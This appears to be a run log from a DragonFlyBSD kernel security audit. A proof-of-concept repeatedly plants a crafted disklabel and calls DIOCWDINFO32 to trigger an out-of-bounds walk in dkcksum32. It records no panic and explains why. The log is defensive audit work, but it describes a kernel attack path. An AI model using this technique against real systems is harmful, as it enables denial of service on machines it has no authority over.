DragonFlyBSD Kernel Audit
DF-0106 / run.log
=== iter 1 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 2 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 3 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 4 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 5 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 6 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 7 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 8 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 9 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
=== iter 10 ===
[*] planted crafted label (d_npartitions=0xffff) at /dev/vn0 offset 512
[*] got valid virgin label from kernel (d_npartitions=16, d_secsize=512)
[*] issuing DIOCWDINFO32 on /dev/vn0s0 -> writedisklabel reads crafted sector -> dkcksum32 OOB walk
poc_writedisklabel: DIOCWDINFO32 returned (kernel NOT panicked): No such process: No such process
rc=0
LOOP_DONE_NO_PANIC

----- OUTCOME: NO PANIC across 10 iterations (and 400+ in extended runs). -----
dkcksum32 DID execute on the writedisklabel path: the loop at
subr_disklabel32.c:363-364 evaluates dkcksum32(dlp) at sector offset 0, where
the crafted label's d_magic/d_magic2 match. However, the 1MiB OOB walk stays
within the ~24MiB contiguous wired getpbuf_mem region (swapbkva_mem) and so
does not fault. The missing-guard bug is confirmed in source; the panic from
the identical root cause is reproduced live via sibling finding DF-0107
(dkcksum32 reached from setdisklabel).